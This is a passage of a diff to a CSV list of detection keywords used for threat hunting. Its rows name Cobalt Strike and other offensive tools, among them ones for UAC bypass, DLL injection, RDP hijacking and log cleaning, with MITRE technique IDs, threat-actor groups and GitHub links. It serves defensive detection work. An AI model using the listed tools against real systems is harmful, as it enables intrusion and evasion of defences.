Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" 
+"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*beacon_funcs.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.h*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x64.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*beacon_funcs.x86.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_generate.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*Beacon_GETPOST*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_host_script*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_inline_execute*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" -"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*beacon_print*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 